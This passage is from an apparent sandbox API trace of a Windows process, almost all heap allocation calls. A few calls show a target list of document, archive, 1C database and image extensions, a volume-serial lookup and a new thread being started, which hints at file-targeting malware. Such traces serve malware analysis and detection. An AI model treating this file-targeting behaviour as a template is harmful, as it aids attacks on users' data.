RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522038, Size=0x10) returned 0x500540 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500540, Size=0x20) returned 0x4d9b70 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522028, Size=0x10) returned 0x500540 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521fe8, Size=0x10) returned 0x500570 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522028, Size=0x8) returned 0x522018 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522048, Size=0x8) returned 0x522058 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500540, Size=0x20) returned 0x4d9bc0 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500570, Size=0x20) returned 0x4d9ad0 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522068, Size=0x8) returned 0x522078 [0261.479] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0261.479] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dda20 | out: hHeap=0x4a0000) returned 1 [0261.479] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5005e8, Size=0x20) returned 0x4d9be8 [0261.479] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x4eee78, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0261.479] lstrlenW (lpString="C:\\") returned 3 [0261.479] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18fcac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fcac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0261.549] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eee78 | out: hHeap=0x4a0000) returned 1 [0261.549] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5220a8, Size=0x82) returned 0x4ddae0 [0261.549] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x5220c8, Size=0x100) returned 0x4ddb70 [0261.549] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4ddae0, Size=0x104) returned 0x521278 [0261.549] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4ddb70, Size=0x200) returned 0x521388 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5220b8 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x521388 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x520ea8 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51f028 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500648 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51f0b0 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x520e90 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x521278 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500660 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddc78 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x520ec0 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd08 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x520ed8 | out: hHeap=0x4a0000) returned 1 [0261.550] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500660, Size=0x20) returned 0x4d9c10 [0261.550] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9c10, Size=0x40) returned 0x4dad18 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x522088 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5005e8 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dda50 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500618 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51efa0 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500600 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x522098 | out: hHeap=0x4a0000) returned 1 [0261.550] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500630 | out: hHeap=0x4a0000) returned 1 [0261.551] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dda20 | out: hHeap=0x4a0000) returned 1 [0261.551] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4da2b8 | out: hHeap=0x4a0000) returned 1 [0261.551] lstrlenW (lpString="%systemdrive%") returned 13 [0261.551] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9be8 | out: hHeap=0x4a0000) returned 1 [0261.551] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51ee90 | out: hHeap=0x4a0000) returned 1 [0261.551] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x522068 | out: hHeap=0x4a0000) returned 1 [0261.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x4dee58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x100 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10014) returned 0x522e80 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x500630 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x500630, Size=0x20) returned 0x4d9c10 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9c10, Size=0x40) returned 0x4dad60 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dad60, Size=0x80) returned 0x51ee90 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4dda58 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dda58, Size=0x200) returned 0x4dda58 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dda58, Size=0x400) returned 0x521278 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521278, Size=0x800) returned 0x521278 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x521278, Size=0x1000) returned 0x532ea0 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10000) returned 0x500688 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x500630 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x500600 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x522068 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x500618 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x4) returned 0x522098 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5005e8 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522068, Size=0x8) returned 0x522088 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x500648 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x522088, Size=0x10) returned 0x520e90 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x520ea8 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x520ec0 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x520e90, Size=0x20) returned 0x4d9c10 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x520e90 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x522088 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x520ed8 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x520ef0 [0261.552] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4d9c10, Size=0x40) returned 0x4dad60 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x520f08 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x520f20 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x520f38 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x520f50 [0261.552] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x520f68 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x520f80 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x522068 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x520f98 [0261.553] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dad60, Size=0x80) returned 0x51ee90 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x520fb0 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x520fc8 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x520fe0 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x520ff8 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521010 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521028 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521040 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x5220c8 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521058 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521070 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521088 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5210a0 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5210b8 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5210d0 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5210e8 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521100 [0261.553] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x51ee90, Size=0x100) returned 0x4f0e98 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521118 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521130 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521148 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x521160 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521178 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521190 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x5220a8 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5211a8 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5211c0 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5211d8 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x5220d8 [0261.553] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5211f0 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521208 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x5220e8 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521220 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521238 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521250 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521290 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5212a8 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5212c0 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x5212d8 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5212f0 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x521308 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521320 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521338 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521350 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521368 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x5220f8 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521380 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521398 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5213b0 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5213c8 [0261.554] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4f0e98, Size=0x200) returned 0x4dda58 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5213e0 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x522108 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5213f8 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521410 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521428 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521440 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521458 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521470 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521488 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5214a0 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5214b8 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5214d0 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5214e8 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521500 [0261.554] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521518 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521530 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521548 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521560 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521578 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521590 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5215a8 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5215c0 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5215d8 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x522118 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5215f0 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521608 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521620 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x522128 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521638 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521650 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521690 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5216a8 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5216c0 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5216d8 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5216f0 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521708 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521720 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521738 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521750 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521768 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521780 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521798 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5217b0 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5217c8 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5217e0 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5217f8 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521810 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521828 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521840 [0261.555] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x522138 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x6) returned 0x522148 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521858 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521870 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521888 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5218a0 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5218b8 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5218d0 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5218e8 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521900 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521918 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521930 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521948 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521960 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521978 [0261.556] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4dda58, Size=0x400) returned 0x521a78 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521990 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5219a8 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x5219c0 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5219d8 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x5219f0 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521a08 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x521a20 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521a38 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x521a50 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2e98 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x522158 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2eb0 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4f2ec8 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2ee0 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2ef8 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2f10 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2f28 [0261.556] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4f2f40 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2f58 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2f70 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2f88 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2fa0 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2fb8 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2fd0 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f2fe8 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3000 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x8) returned 0x522168 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3018 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3030 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3048 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3060 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3078 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3090 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f30a8 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f30c0 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f30d8 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4f30f0 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3108 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xe) returned 0x4f3120 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3138 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3150 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3168 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3180 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3198 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc) returned 0x4f31b0 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f31c8 [0261.557] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3328 [0262.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3340 [0262.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3358 [0262.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3370 [0262.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f3388 [0262.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 0x4f33a0 [0262.005] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa) returned 